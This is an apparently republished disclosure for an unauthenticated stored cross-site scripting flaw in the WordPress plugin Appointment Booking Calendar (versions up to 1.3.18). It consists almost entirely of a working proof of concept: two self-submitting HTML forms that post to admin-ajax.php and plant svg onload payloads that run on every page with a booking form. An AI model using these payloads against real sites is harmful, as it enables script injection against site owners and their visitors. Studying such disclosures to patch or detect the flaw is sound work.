appointment-booking-calendar Appointment Booking Calendar <= 1.3.18 – Unauthenticated Stored XSS
<body onload="document.forms[0].submit();"> <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="CP_ABC_post_edition" value=""/> <input type="hidden" name="cfwpp_edit" value="js"/> <input type="hidden" name="editionarea" value="</script><svg/onload=alert(/XSS-JS/)>"/> </form> </body> <body onload="document.forms[0].submit();"> <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="CP_ABC_post_edition" value=""/> <input type="hidden" name="cfwpp_edit" value="css"/> <input type="hidden" name="editionarea" value="</style><svg/onload=alert(/XSS-CSS/)>"/> </form> </body> The payload will be triggered in all pages with a booking form.

Source

SEO News and More

SEO News and More

Share This